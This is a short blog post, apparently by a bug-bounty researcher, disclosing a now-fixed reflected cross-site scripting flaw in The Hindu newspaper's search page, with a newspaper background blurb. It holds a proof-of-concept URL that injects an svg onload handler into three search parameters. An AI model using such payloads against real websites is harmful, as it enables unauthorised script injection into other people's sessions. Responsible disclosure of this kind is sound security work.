How I find Cross Site Script in THE HINDU website

I felt happy when I found the Cross Site Script vulnerability in the hindu newspaper website which is the most leading newspaper in India.It my pleasure that I helped them as a White Hat Web Application Security Researcher.
This is my First Finding.

                                                               About The Hindu
The Hindu is an English-language Indian daily newspaper. Headquartered at ChennaiThe Hindu was published weekly when it was launched in 1878, and started publishing daily in 1889. It is the second most circulated English-language newspaper in India, with average qualifying sales of 1.45 million copies as of Jan−Jun 2016.[4] The Hindu has its largest base of circulation in southern India, and is the most widely read English daily newspaper in Andhra PradeshTamil Nadu and KeralaTelanganaKarnataka.
It is my Honor that I helped The Hindu.

Here is a Proof of Concept of Cross Site Scripting Vulnerability in thehindu.com



Host: https://www.thehindu.com

P.O.C-http://www.thehindu.com/search/?q=%22+%2F%3E%3C%2Fp%3E%3Csvg%2Fonload%3Dprompt(document.domain)%3E&t=%22+%2F%3E%3C%2Fp%3E%3Csvg%2Fonload%3Dprompt(document.domain)%3E&au=%22+%2F%3E%3C%2Fp%3E%3Csvg%2Fonload%3Dprompt(document.domain)%3E

Status-Fixed.


                                           

Popular posts from this blog

10 Rules of Bug Bounty

Getting started with Bug Bounty.